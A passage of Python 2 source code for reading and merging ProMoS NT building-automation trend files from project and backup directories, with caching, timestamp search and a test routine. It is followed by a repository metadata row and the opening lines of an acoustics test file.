if dbdata_list[0].get_datetime() < timestamp_datetime:
low = mid + 1
else:
high = mid
idx_after = low
# now we have to interpret the given index:
# FIXME: should we care for corrupted trendfiles? (e.g. an empty file would throw IndexError-exception...)
if idx_after == 0:
# timestamp_datetime is older than our trenddata
search_result.before_list = []
search_result.exact_list = []
search_result.after_list = self._indexed_by_index[0]
elif idx_after == len(self._indexed_by_index):
# timestamp_datetime is younger than our trenddata
search_result.before_list = self._indexed_by_index[-1]
search_result.exact_list = []
search_result.after_list = []
else:
# timestamp_datetime must be between timestamps in our trenddata
search_result.before_list = self._indexed_by_index[idx_after - 1]
search_result.exact_list = []
search_result.after_list = self._indexed_by_index[idx_after]
return search_result
def get_dbdata_lists_generator(self):
"""
generate lists with DBData-elements grouped by timestamp
(ProMoS NT(c) PDBS daemon stores them in sequence, so they should be sorted by timestamp)
"""
for curr_list in self._indexed_by_index:
yield curr_list
def get_dbdata_list_of_lists(self):
"""
return whole list containing lists with DBData-elements grouped by timestamp
(ProMoS NT(c) PDBS daemon stores them in sequence, so they should be sorted by timestamp)
"""
return self._indexed_by_index
def get_dbdata_timestamps_generator(self):
"""
return all contained timestamps
(they should be in ascending order, ProMoS NT(c) PDBS daemon stores them in sequence in HDB files,
and we put then into an OrderedDict)
"""
return self._indexed_by_timestamp.iterkeys()
class _Cached_Trendfile(object):
"""Metadata and reference to a trendfile object, used by Trendfile_Cache_Handler()"""
# code is adapted from "PSC_file_selector.py"
def __init__(self, fullpath):
self._fullpath = fullpath
self._whole_file = None
self._modification_time = 0
self._filesize = 0
self._last_readtime = -1
def _read_metadata(self):
stat = os.stat(self._fullpath)
self._filesize = stat.st_size
self._modification_time = stat.st_mtime
def get_whole_file(self):
self._read_metadata()
if self._last_readtime <> self._modification_time:
# first reading or file changed
self._whole_file = IndexedTrendfile(self._fullpath)
self._last_readtime = self._modification_time
return self._whole_file
def get_metadata(self):
# examples from http://stackoverflow.com/questions/39359245/from-stat-st-mtime-to-datetime
# and http://stackoverflow.com/questions/6591931/getting-file-size-in-python
# and https://docs.python.org/2/library/stat.html
# and http://stackoverflow.com/questions/455612/limiting-floats-to-two-decimal-points
# and http://stackoverflow.com/questions/311627/how-to-print-date-in-a-regular-format-in-python
self._read_metadata()
size = float("{0:.2f}".format(self._filesize / 1024.0))
mod_time = datetime.datetime.fromtimestamp(self._modification_time).strftime("%Y.%m.%d %H:%M:%S")
return size, mod_time
class Trendfile_Cache_Handler(object):
"""
Holds trendfile objects in a cache for more efficiency
=>currently it's one program-wide cache
"""
# class-variable with cache
# =>using OrderedDict() so it's simple to maintain FIFO-cache
# https://docs.python.org/2/library/collections.html#collections.OrderedDict
_trendfile_cache_dict = collections.OrderedDict()
used_cache_size = 0
# soft-limit of maximum cache size
CACHESIZE_KBYTES = 1024 * 50 # 50MBytes
def get_trendfile_obj(self, filename_fullpath, cached=True):
"""optional parameter 'cached': False means working on an isolated Trendfile without interfering other instance holders
(it's possible that these DBData-lists could get corrupted, but I'm not 100% shure...)"""
# maintain FIFO-cache: deleting oldest item if cache is too large
curr_size = 0
for trf in Trendfile_Cache_Handler._trendfile_cache_dict:
size, mod_time = Trendfile_Cache_Handler._trendfile_cache_dict[trf].get_metadata()
curr_size = curr_size + size
while curr_size > Trendfile_Cache_Handler.CACHESIZE_KBYTES:
# remove oldest item
dumped_obj = Trendfile_Cache_Handler._trendfile_cache_dict.popitem(last=False)
# handling request
if cached:
if not filename_fullpath in Trendfile_Cache_Handler._trendfile_cache_dict:
# first time handling of this file...
Trendfile_Cache_Handler._trendfile_cache_dict[filename_fullpath] = _Cached_Trendfile(filename_fullpath)
return Trendfile_Cache_Handler._trendfile_cache_dict[filename_fullpath].get_whole_file()
else:
# bypass whole caching
return IndexedTrendfile(filename_fullpath)
class MetaTrendfile(object):
"""
provides all trenddata of a specific DMS datapoint from HDB files in project directory and backup directory
"""
def __init__(self, projectpath_str, dms_dp_str):
self.projectpath_str = projectpath_str
self.dms_dp_str = dms_dp_str
self.dat_dir = os.path.join(projectpath_str, 'dat')
self.backup_dir = self._get_backup_dir()
self.backup_subdirs_dict = self._find_backup_subdirs() # stores subdir as string (key: tuple (year, month))
self.trend_filename_str = self._get_trend_filename()
self.trf_cache_handler = Trendfile_Cache_Handler()
# timezone awareness (FIXME: currently fixed to 'Europe/Zurich')
_tz = timezone.Timezone().get_tz()
def _get_backup_dir(self):
# we have to read INI-file <projectpath>\cfg\PDBSBACK.CFG
# and get this attribut:
# [Backup]
# Path=D:\Trend
cfg_parser = configparser.ConfigParser()
configfile_fullpath = os.path.join(self.projectpath_str, 'cfg', 'PDBSBACK.CFG')
cfg_parser.read(configfile_fullpath)
return cfg_parser["Backup"]["Path"]
def _get_trend_filename(self):
# FIXME: I assume that all illegal characters in a DMS-datapoint gets replaced by "_" for getting a valid filename....
# FIXME: It's a known problem that these datapoints stores trends in the SAME TRENDFILE (=>corrupted trend!!!)
# FIXME: should we abort processing file if we can't find a file with the right DMS-DP-string in trendfile-header?
# MSR_U02:Test:L01_02:foo:Input
# MSR_U02:Test:L01:02:foo:Input
# MSR_U02:Test:L01:02_foo:Input
# ===>trenddata of all three TRD-datapoints were combined into file "MSR_U02_Test_L01_02_foo_Input.hdb" !!!
# some help from http://stackoverflow.com/questions/295135/turn-a-string-into-a-valid-filename
# =>now we restrict filename and hope PDBS does it the same way...
valid_chars = set(string.ascii_letters) ^ set(string.digits)
char_list = []
for char in self.dms_dp_str:
if char in valid_chars:
char_list.append(char)
else:
char_list.append('_')
return ''.join(char_list) + '.hdb'
def _find_backup_subdirs(self):
"""
get a list of available backup subdirectories
"""
mydict = {}
regex_pattern = r'Month_(?P<month>\d\d)\.(?P<year>\d\d\d\d)'
for subdir in os.listdir(self.backup_dir):
# an example for backup subdirectory:
# february 2017: "Month_02.2017"
m = re.match(regex_pattern, subdir)
if m:
# key in our dictionary: tuple (year, month) => value is whole regex match
key = m.group('year'), m.group('month')
mydict[key] = m.group(0)
return mydict
def _get_backup_subdir(self, timestamp_datetime):
"""
locate trenddata by timestamp
"""
# an example for backup subdirectory:
# february 2017: "Month_02.2017"
month = timestamp_datetime.strftime('%m')
year = timestamp_datetime.strftime('%Y')
return ''.join(['Month_', month, '.', year])
def _get_endpoint_timestamp(self, position_str="first"):
"""
returns timestamp of our oldest or youngest DBData element,
combined from dat- and backup directory.
=>parameter position_str is either "first" or "last"
("first" is default, anything other means "last")
"""
endpoint_timestamp_list = []
try:
# searching in project directory
filename_fullpath = os.path.join(self.dat_dir, self.trend_filename_str)
dat_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=True)
if os.path.exists(filename_fullpath):
# processing this trendfile
if position_str == "first":
# getting oldest DBData
found_timestamp = dat_trendfile.get_first_timestamp()
else:
# getting youngest DBData
found_timestamp = dat_trendfile.get_last_timestamp()
endpoint_timestamp_list.append(found_timestamp)
except Exception as ex:
print('WARNING: MetaTrendfile._get_endpoint_timestamp(): got exception "' + repr(ex) + '" while getting trend from "' + filename_fullpath + '"')
try:
# searching in backup subdirectory
if position_str == "first":
# searching oldest DBData =>ascending sorting
reversed = False
else:
# searching youngest DBData =>descending sorting
reversed = True
filename_fullpath = ''
for year, month in sorted(self.backup_subdirs_dict.keys(), reverse=reversed):
subdir_str = self.backup_subdirs_dict[year, month]
filename_fullpath = os.path.join(self.backup_dir, subdir_str, self.trend_filename_str)
if os.path.exists(filename_fullpath):
# we found a backup, it contains perhaps older trenddata than in project dir...
break
if filename_fullpath:
bak_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=True)
if position_str == "first":
# getting oldest DBData
found_timestamp = bak_trendfile.get_first_timestamp()
else:
# getting youngest DBData
found_timestamp = bak_trendfile.get_last_timestamp()
endpoint_timestamp_list.append(found_timestamp)
except Exception as ex:
print('WARNING: MetaTrendfile._get_endpoint_timestamp(): got exception "' + repr(ex) + '" while getting trend from "' + filename_fullpath + '"')
try:
if position_str == "first":
# getting oldest DBData
return min(endpoint_timestamp_list)
else:
# getting youngest DBData
return max(endpoint_timestamp_list)
except ValueError:
# seems we didn't found trenddata (list is empty)
return None
def get_first_timestamp(self):
"""
returns timestamp of our oldest DBData element
"""
return self._get_endpoint_timestamp(position_str="first")
def get_last_timestamp(self):
"""
returns timestamp of our youngest DBData element
"""
return self._get_endpoint_timestamp(position_str="last")
def get_DBData_Timestamp_Search_Result(self, timestamp_datetime):
"""
returns an instance of DBData_Timestamp_Search_Result according to given timestamp
=>remember: every search must return either an exact match or the values just before and after it, except first or last DBData!
"""
# FIXME: this method is too heavy and should be optimized... =>rewrite it!!!
search_result_list = []
try:
# searching in project directory
filename_fullpath = os.path.join(self.dat_dir, self.trend_filename_str)
if os.path.exists(filename_fullpath):
dat_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=True)
search_result = dat_trendfile.get_DBData_Timestamp_Search_Result(timestamp_datetime)
if search_result:
search_result_list.append(search_result)
except Exception as ex:
print('WARNING: MetaTrendfile.get_DBData_Timestamp_Search_Result(): got exception "' + repr(ex) + '" while getting trend from "' + filename_fullpath + '"')
try:
# searching in backup directory:
# first we try to get a "exact_list"-hit, then we
# walk in both directions through directories and choose best match
# for "file containing before_list" <= timestamp <= "file containing after_list"
# trying specific timestamp
# (following flags are preparation for further searching)
bak_searching_past = True
bak_searching_future = True
curr_subdir = self._get_backup_subdir(timestamp_datetime)
filename_fullpath = os.path.join(self.backup_dir, curr_subdir, self.trend_filename_str)
if os.path.exists(filename_fullpath):
bak_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=True)
search_result = bak_trendfile.get_DBData_Timestamp_Search_Result(timestamp_datetime)
if search_result:
# got a match... we need to decide how to search further...
search_result_list.append(search_result)
if search_result.exact_list:
# no need to search further...
bak_searching_past = False
bak_searching_future = False
elif search_result.before_list and not search_result.after_list:
bak_searching_past = False
bak_searching_future = True
elif search_result.after_list and not search_result.before_list:
bak_searching_past = True
bak_searching_future = False
except Exception as ex:
print('WARNING: [1] MetaTrendfile.get_DBData_Timestamp_Search_Result(): got exception "' + repr(ex) + '" while getting trend from "' + filename_fullpath + '"')
try:
if bak_searching_past:
# walking backwards through available directories
for year, month in sorted(self.backup_subdirs_dict.keys(), reverse=True):
backupdir_timestamp = datetime.datetime(year=int(year), month=int(month), day=1, tzinfo=MetaTrendfile._tz)
if backupdir_timestamp < timestamp_datetime:
subdir_str = self.backup_subdirs_dict[year, month]
filename_fullpath = os.path.join(self.backup_dir, subdir_str, self.trend_filename_str)
if os.path.exists(filename_fullpath):
# we found a backup, it should contain DBData before timestamp...
bak_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=True)
search_result = bak_trendfile.get_DBData_Timestamp_Search_Result(timestamp_datetime)
if search_result:
search_result_list.append(search_result)
break
except Exception as ex:
print('WARNING: [2] MetaTrendfile.get_DBData_Timestamp_Search_Result(): got exception "' + repr(ex) + '" while getting trend from "' + filename_fullpath + '"')
try:
if bak_searching_future:
# walking forward through available directories
for year, month in sorted(self.backup_subdirs_dict.keys(), reverse=False):
# with help from http://stackoverflow.com/questions/42950/get-last-day-of-the-month-in-python
last_day_of_month = calendar.monthrange(int(year), int(month))[1]
backupdir_timestamp = datetime.datetime(year=int(year), month=int(month), day=last_day_of_month, tzinfo=MetaTrendfile._tz)
if backupdir_timestamp > timestamp_datetime:
subdir_str = self.backup_subdirs_dict[year, month]
filename_fullpath = os.path.join(self.backup_dir, subdir_str, self.trend_filename_str)
if os.path.exists(filename_fullpath):
# we found a backup, it should contain DBData after timestamp...
bak_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=True)
search_result = bak_trendfile.get_DBData_Timestamp_Search_Result(timestamp_datetime)
if search_result:
search_result_list.append(search_result)
break
except Exception as ex:
print('WARNING: [3] MetaTrendfile.get_DBData_Timestamp_Search_Result(): got exception "' + repr(ex) + '" while getting trend from "' + filename_fullpath + '"')
# getting closest match from all search results
# FIXME: should we care for mismatch between amount of stored DBData items for one timestamp in DAT and Backup?
combined_sr = DBData_Timestamp_Search_Result()
# first try: getting exact match
if search_result_list:
dbdata_set = set()
for sr in search_result_list:
if sr.exact_list:
# using all DBData elements of all exact search results
dbdata_set.update(sr.exact_list)
if dbdata_set:
# got exact search results... =>give a list back to caller
combined_sr.exact_list = list(dbdata_set)
assert combined_sr.exact_list and not combined_sr.before_list and not combined_sr.after_list, 'exact match for this timestamp expected!'
return combined_sr
# second try: getting match as close as possible from all available sources
if search_result_list:
# collecting closest timestamp-lists
past_timestamp = datetime.datetime(year=1900, month=1, day=1, tzinfo=MetaTrendfile._tz)
future_timestamp = datetime.datetime(year=2100, month=1, day=1, tzinfo=MetaTrendfile._tz)
for sr in search_result_list:
# nearest timestamp in the past ("before_list")
if sr.before_list:
curr_timestamp = sr.before_list[0].get_datetime()
if curr_timestamp > past_timestamp:
# found a closer match
combined_sr.before_list = sr.before_list
past_timestamp = curr_timestamp
elif curr_timestamp == past_timestamp:
# found result from other source => inserting DBData elements in case some were missing
combined_sr.before_list.extend(sr.before_list)
# nearest timestamp in the future ("after_list")
if sr.after_list:
curr_timestamp = sr.after_list[0].get_datetime()
if curr_timestamp < future_timestamp:
# found a closer match
combined_sr.after_list = sr.after_list
future_timestamp = curr_timestamp
elif curr_timestamp == past_timestamp:
# found result from other source => inserting DBData elements in case some were missing
combined_sr.after_list.extend(sr.after_list)
assert not combined_sr.exact_list, 'no exact match for this timestamp expected!'
# get unique DBData elements
dbdata_before_set = set(combined_sr.before_list)
combined_sr.before_list = list(dbdata_before_set)
dbdata_after_set = set(combined_sr.after_list)
combined_sr.after_list = list(dbdata_after_set)
return combined_sr
def get_dbdata_lists_generator(self, start_datetime=None, end_datetime=None):
"""
a generator over all available trenddata for (perhaps) memory efficient retrieving lists with DBData elements,
items with same timestamp are grouped
(caller can only loop once through generator,
read here: http://stackoverflow.com/questions/231767/what-does-the-yield-keyword-do-in-python )
=>optional arguments allows filtering of DBData elements
=>using something similar like "mergesort" algorithm: https://en.wikipedia.org/wiki/Merge_sort
=>using "deque" objects for efficient popleft: https://docs.python.org/2/library/collections.html#collections.deque
=>using uncached trendfile, since we MODIFY the internal DBData-lists
"""
# FIXME: do a cleaner implementation of this...
# trenddata in project directory:
# =>using one queue
dat_deque = collections.deque()
try:
# trendfile in project directory:
filename_fullpath = os.path.join(self.dat_dir, self.trend_filename_str)
if os.path.exists(filename_fullpath):
# disable cache because we alter DBData-list...!!
dat_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=False)
dat_deque = collections.deque(dat_trendfile.get_dbdata_list_of_lists())
except Exception as ex:
print('WARNING: MetaTrendfile.get_dbdata_lists_generator(): got exception "' + repr(ex) + '" while getting trend from "' + filename_fullpath + '"')
# trenddata in backup subdirectories:
# =>interpretation as one long queue, combined from different trendfiles
# (no subclassing of deque since we don't want to implement all methods of deque()...)
class _deque_wrapper(object):
def __init__(self, backup_subdirs_dict, backup_dir, trend_filename_str, trf_cache_handler):
self._deque_obj = collections.deque()
self._backup_subdirs_dict = backup_subdirs_dict
self._backup_dir = backup_dir
self._trend_filename_str = trend_filename_str
self.trf_cache_handler = trf_cache_handler
self._subdir_iter = iter(sorted(backup_subdirs_dict.keys(), reverse=False))
self._load_next_trendfile()
def _load_next_trendfile(self):
# "deque" is getting empty... trying to append next trendfile
try:
subdir_str = self._backup_subdirs_dict[self._subdir_iter.next()]
filename_fullpath = os.path.join(self._backup_dir, subdir_str, self._trend_filename_str)
if os.path.exists(filename_fullpath):
# we found a backup file
# disable cache because we alter DBData-list...!!
bak_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=False)
self._deque_obj.extend(bak_trendfile.get_dbdata_list_of_lists())
except StopIteration:
# there are no more backup subdirs to check...
pass
def popleft(self):
# make shure this class contains enough trenddata, then return next element
# (if we let deque ran out of elements then statement "if bak_deque" will fail)
if len(self._deque_obj) <= 1:
# "deque" is empty... trying to append next trendfile
self._load_next_trendfile()
return self._deque_obj.popleft()
def __len__(self):
# overriding this hook method for allowing getting current size of deque object
# (with help from http://stackoverflow.com/questions/15114023/using-len-and-def-len-self-to-build-a-class
# and http://stackoverflow.com/questions/7816363/if-a-vs-if-a-is-not-none
# )
return len(self._deque_obj)
bak_deque = _deque_wrapper(self.backup_subdirs_dict, self.backup_dir, self.trend_filename_str, self.trf_cache_handler)
# checking tail of both deques and return list with unique DBData elements at oldest timestamp
# =>do until we returned all available trenddata
dat_list = []
bak_list = []
while True:
# get DBData-list from each tail
curr_list = []
if dat_deque and bak_deque:
# both trenddata source available...
# =>only get new items when there's nothing left from earlier round
if not dat_list:
dat_list = dat_deque.popleft()
if not bak_list:
bak_list = bak_deque.popleft()
# return older items to caller
# if we have same timestamp then we collect all unique DBData element
dat_timestamp = dat_list[0].get_datetime()
bak_timestamp = bak_list[0].get_datetime()
if bak_timestamp < dat_timestamp:
curr_list = bak_list
bak_list = []
elif dat_timestamp < bak_timestamp:
curr_list = dat_list
dat_list = []
else:
my_set = set(dat_list + bak_list)
curr_list = list(my_set)
dat_list = []
bak_list = []
elif dat_deque:
# only trenddata in project directory available...
curr_list = dat_deque.popleft()
elif bak_deque:
# only trenddata in backup directory available...
curr_list = bak_deque.popleft()
else:
# no more trenddata left...
curr_list = []
if curr_list:
# check filter
ignore = False
if start_datetime:
if curr_list[0].get_datetime() < start_datetime:
ignore = True
if end_datetime:
if curr_list[0].get_datetime() > end_datetime:
ignore = True
# nothing to do, stop iteration
break
if not ignore:
yield curr_list
else:
# nothing to do, stop iteration
break
def get_search_result_generator(self, start_datetime=None, stop_datetime=None):
"""
a generator creating DBData_Timestamp_Search_Result objects with all available trenddata as exact-list
(reusing all DBData lists from get_dbdata_lists_generator()
"""
for curr_list in self.get_dbdata_lists_generator(start_datetime, stop_datetime):
sr = DBData_Timestamp_Search_Result()
# returning this list of DBData elements as exact search hit
sr.exact_list.extend(curr_list)
yield sr
def get_dbdata_timestamps_generator(self, start_datetime=None, stop_datetime=None):
"""
a generator creating objects with timestamps and time difference to last timestamp of all available trenddata
(contains some copied code from "self.get_DBData_Timestamp_Search_Result(self, timestamp_datetime()" )
"""
# getting generators of all timestamp sources,
# then always yield the oldest timestamp of all active timestamp sources
# helper class for combining timestamp and time difference
class Tstamp(object):
"""
tstamp: timestamp as datetime.datetime object
diff: difference to last timestamp in seconds
"""
old_tstamp_dt = None
def __init__(self, curr_tstamp_dt):
self.tstamp_dt = curr_tstamp_dt
self.is_interpolated = False
if not Tstamp.old_tstamp_dt:
# first run =>first timestamp is always okay and should have timediff = 0
self.timediff = 0.0
else:
self.timediff = (curr_tstamp_dt - Tstamp.old_tstamp_dt).total_seconds()
Tstamp.old_tstamp_dt = curr_tstamp_dt
if not start_datetime:
start_datetime = datetime.datetime.fromtimestamp(0, tz=MetaTrendfile._tz)
if not stop_datetime:
stop_datetime = datetime.datetime(year=3000, month=1, day=1).replace(tzinfo=MetaTrendfile._tz)
prj_iter = iter([])
# trenddata in project directory
filename_fullpath = os.path.join(self.dat_dir, self.trend_filename_str)
if os.path.exists(filename_fullpath):
dat_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=True)
usable = True
if dat_trendfile.get_last_timestamp() < start_datetime:
# trenddata is too old
usable = False
if dat_trendfile.get_first_timestamp() > stop_datetime:
# trenddata is too new
usable = False
if usable:
prj_iter = dat_trendfile.get_dbdata_timestamps_generator()
# lazily generating timestamp iterators from backup
# (idea from http://stackoverflow.com/questions/15004772/what-is-the-difference-between-chain-and-chain-from-iterable-in-itertools )
def generate_backup_iterators():
# walking forward through available directories
for year, month in sorted(self.backup_subdirs_dict.keys(), reverse=False):
if int(year) >= start_datetime.year and int(month) >= start_datetime.month and \
int(year) <= stop_datetime.year and int(month) <= stop_datetime.month:
# current backup directory should contain trenddata in requested timerange
subdir_str = self.backup_subdirs_dict[year, month]
filename_fullpath = os.path.join(self.backup_dir, subdir_str, self.trend_filename_str)
if os.path.exists(filename_fullpath):
# we found a backup, it should contain trenddata...
bak_trendfile = self.trf_cache_handler.get_trendfile_obj(filename_fullpath, cached=True)
yield bak_trendfile.get_dbdata_timestamps_generator()
# combine this generator of generators with trenddata from project
bak_iter = itertools.chain.from_iterable(generate_backup_iterators())
tstamp_generator_list = []
for source in [prj_iter, bak_iter]:
try:
# this list always contains head element from iterator, and iterator itself
new_source = [source.next(), source]
tstamp_generator_list.append(new_source)
except StopIteration:
pass
# request items from both generators, always returning smaller value
while tstamp_generator_list:
# consuming timestamps, returning always oldest one, updating first element
# sorting list of tuples: http://stackoverflow.com/questions/10695139/sort-a-list-of-tuples-by-2nd-item-integer-value
# =>getting source list with oldest timestamp
tstamp_generator_list = sorted(tstamp_generator_list, key=itemgetter(0))
oldest_source_list = tstamp_generator_list[0]
curr_tstamp, curr_iter = oldest_source_list[0], oldest_source_list[1]
if curr_tstamp >= start_datetime and curr_tstamp <= stop_datetime:
yield Tstamp(curr_tstamp)
try:
# update head-element of current timestamp source
oldest_source_list[0] = curr_iter.next()
except StopIteration:
# iterator is empty... =>removing this timestamp-source
tstamp_generator_list = tstamp_generator_list[1:]
def main(argv=None):
# for filename in ['C:\Promos15\proj\Winterthur_MFH_Schaffhauserstrasse\dat\MSR01_Allg_Aussentemp_Istwert.hdb']:
# #trf = RawTrendfile(filename)
# trf = IndexedTrendfile(filename)
# print('IndexedTrendfile "' + filename + '" contains trenddata of DMS datapoint ' + trf.get_dms_Datapoint())
# print('number of DBData elements: ' + str(trf.get_nof_dbdata_elements()))
# print('number of unique timestamps: ' + str(len(trf._indexed_by_timestamp)))
# print('timestamp of first DBData element: ' + trf.get_first_timestamp().strftime('%Y-%m-%d %H:%M:%S'))
# print('timestamp of last DBData element: ' + trf.get_last_timestamp().strftime('%Y-%m-%d %H:%M:%S'))
# print('(timespan is ' + str((trf.get_last_timestamp() - trf.get_first_timestamp()).days) + ' days)')
#
# # getting some values...
# # hint from http://stackoverflow.com/questions/4741243/how-to-pick-just-one-item-from-a-generator-in-python
# # =>we need to get another generator object when we want to get the same interation!
# for x in range(2):
# print('interpretation of values of some DBData elements: (run number ' + str(x) + ')')
# my_generator = trf.get_dbdata_elements_generator()
# for x in range(10):
# elem = my_generator.next()
# print('as boolean: ' + str(elem.get_value_as_boolean()) + '\tas int: ' + str(elem.get_value_as_int())+ '\tas float: ' + str(elem.get_value_as_float()))
#
# # getting trenddata by timestamp:
# timestamps_list = [datetime.datetime(year=2016, month=1, day=6, hour=4, minute=27, second=23),
# datetime.datetime(year=2016, month=1, day=6, hour=4, minute=27, second=24),
# datetime.datetime(year=2016, month=1, day=6, hour=4, minute=27, second=25),
# datetime.datetime(year=2017, month=2, day=6, hour=20, minute=15, second=13),
# datetime.datetime(year=2017, month=2, day=6, hour=20, minute=15, second=14),
# datetime.datetime(year=2017, month=2, day=6, hour=20, minute=15, second=15)]
# for timestamp in timestamps_list:
# print('getting DBData elements with timestamp "' + timestamp.strftime('%Y-%m-%d %H:%M:%S') + '"')
# result = trf.get_DBData_Timestamp_Search_Result(timestamp)
# print('\t"before_list" contains:')
# for item in result.before_list:
# print('\t\t' + item.get_datetime().strftime('%Y-%m-%d %H:%M:%S') + ' / ' + str(item.get_value_as_float()))
# print('\t"exact_list" contains:')
# for item in result.exact_list:
# print('\t\t' + item.get_datetime().strftime('%Y-%m-%d %H:%M:%S') + ' / ' + str(item.get_value_as_float()))
# print('\t"after_list" contains:')
# for item in result.after_list:
# print('\t\t' + item.get_datetime().strftime('%Y-%m-%d %H:%M:%S') + ' / ' + str(item.get_value_as_float()))
# trying backup and projekt directory:
print('######################################################################')
print('\nTEST: MetaTrendfile() ')
mytrf = MetaTrendfile('C:\Promos15\proj\Winterthur_MFH_Schaffhauserstrasse', 'MSR01:Allg:Aussentemp:Istwert')
print('get_first_timestamp(): ' + repr(mytrf.get_first_timestamp()))
print('get_last_timestamp(): ' + repr(mytrf.get_last_timestamp()))
# getting trenddata by timestamp:
timestamps_list = [datetime.datetime(year=2016, month=1, day=6, hour=4, minute=27, second=23, tzinfo=MetaTrendfile._tz),
datetime.datetime(year=2016, month=1, day=6, hour=4, minute=27, second=24, tzinfo=MetaTrendfile._tz),
datetime.datetime(year=2016, month=1, day=6, hour=4, minute=27, second=25, tzinfo=MetaTrendfile._tz),
datetime.datetime(year=2017, month=2, day=6, hour=20, minute=15, second=13, tzinfo=MetaTrendfile._tz),
datetime.datetime(year=2017, month=2, day=6, hour=20, minute=15, second=14, tzinfo=MetaTrendfile._tz),
datetime.datetime(year=2017, month=2, day=6, hour=20, minute=15, second=15, tzinfo=MetaTrendfile._tz),
datetime.datetime(year=1950, month=1, day=1, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz),
datetime.datetime(year=2999, month=1, day=1, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz)
]
for timestamp in timestamps_list:
print('getting DBData elements with timestamp "' + timestamp.strftime('%Y-%m-%d %H:%M:%S') + '"')
result = mytrf.get_DBData_Timestamp_Search_Result(timestamp)
print('\t"before_list" contains:')
for item in result.before_list:
print('\t\t' + item.get_datetime().strftime('%Y-%m-%d %H:%M:%S') + ' / ' + str(item.get_value_as_float()) + ' / ' + item.getStatusBitsString())
print('\t"exact_list" contains:')
for item in result.exact_list:
print('\t\t' + item.get_datetime().strftime('%Y-%m-%d %H:%M:%S') + ' / ' + str(item.get_value_as_float()) + ' / ' + item.getStatusBitsString())
print('\t"after_list" contains:')
for item in result.after_list:
print('\t\t' + item.get_datetime().strftime('%Y-%m-%d %H:%M:%S') + ' / ' + str(item.get_value_as_float()) + ' / ' + item.getStatusBitsString())
# test filtering identical timestamps
print('\n\ntest filtering identical timestamps')
print('######################################')
filename_fullpath = r'C:\Promos15\proj\Winterthur_MFH_Schaffhauserstrasse\dat\MSR01_Allg_Aussentemp_Istwert_LAST_VALUE.hdb'
#trf_test = IndexedTrendfile()
# TESTING cache:
trf_test = Trendfile_Cache_Handler().get_trendfile_obj(filename_fullpath, cached=True)
print('DMS-datapoint= ' + trf_test.get_dms_Datapoint())
print('\tcontained DBData-elements:')
for curr_dbdata in trf_test.get_dbdata_elements_generator():
print('\ttimestamp: ' + repr(curr_dbdata.get_datetime()))
print('\tvalue: ' + str(curr_dbdata.get_value_as_float()))
print('\thash()= ' + str(hash(curr_dbdata)))
print('\n\tDBData-elements retrieved as set():')
for curr_dbdata in trf_test.get_dbdata_elements_as_set():
print('\ttimestamp: ' + repr(curr_dbdata.get_datetime()))
print('\tvalue: ' + str(curr_dbdata.get_value_as_float()))
print('\thash()= ' + str(hash(curr_dbdata)))
# test number of unique timestamps
print('\n\ntest number of unique timestamps')
print('#####################################')
timespans = [#(None, None),
(datetime.datetime(year=2013, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz), datetime.datetime(year=2014, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz)),
(datetime.datetime(year=2014, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz), datetime.datetime(year=2015, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz)),
(datetime.datetime(year=2015, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz), datetime.datetime(year=2016, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz)),
(datetime.datetime(year=2016, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz), datetime.datetime(year=2017, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz)),
(datetime.datetime(year=2017, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz), datetime.datetime(year=2018, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz)),
(datetime.datetime(year=2013, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz), datetime.datetime(year=2020, month=1, day=6, hour=0, minute=0, second=0, tzinfo=MetaTrendfile._tz)),
(datetime.datetime(year=2016, month=1, day=6, hour=4, minute=27, second=24, tzinfo=MetaTrendfile._tz), datetime.datetime(year=2017, month=2, day=6, hour=20, minute=15, second=14, tzinfo=MetaTrendfile._tz))]
for start, end in timespans:
try:
print('\tbetween ' + start.strftime('%Y-%m-%d %H:%M:%S') + ' and ' + end.strftime('%Y-%m-%d %H:%M:%S') + ':')
except AttributeError:
# this is testcase with (None, None)
print('\tin all available trenddata:')
x = 0
for item in mytrf.get_dbdata_lists_generator(start, end):
x = x + 1
print('\t\t=>' + str(x) + ' unique timestamps.')
# testing MetaTrendfile.get_dbdata_timestamps_generator()
print('\n\ntesting MetaTrendfile.get_dbdata_timestamps_generator()')
print('**********************************************************')
curr_trf = MetaTrendfile(r'C:\Promos15\proj\Foo', 'NS_MSR01a:H01:AussenTemp:Istwert')
with open(r'd:\foo_Aussentemp.csv', "w") as f:
for tstamp in curr_trf.get_dbdata_timestamps_generator(
start_datetime=datetime.datetime(year=2017, month=2, day=1, hour=0, minute=0, tzinfo=MetaTrendfile._tz),
stop_datetime=datetime.datetime(year=2017, month=2, day=6, hour=0, minute=0, tzinfo=MetaTrendfile._tz)
):
tstamp_str = str(tstamp.tstamp_dt)
timediff_str = str(tstamp.timediff)
f.write(';'.join([tstamp_str, timediff_str]) + '\n')
return 0 # success
if __name__ == '__main__':
status = main()
# disable closing of Notepad++
# sys.exit(status)
| stefanbraun-private/pyVisiToolkit | src/trend/datasource/trendfile.py | Python | gpl-3.0 | 49,022 | 0.023622 |
from acoustics.decibel import *
def test_dbsum():
assert(abs(dbsum([10.0, 10.0]) - 13.0103) < 1e-5)
def test_dbmean():
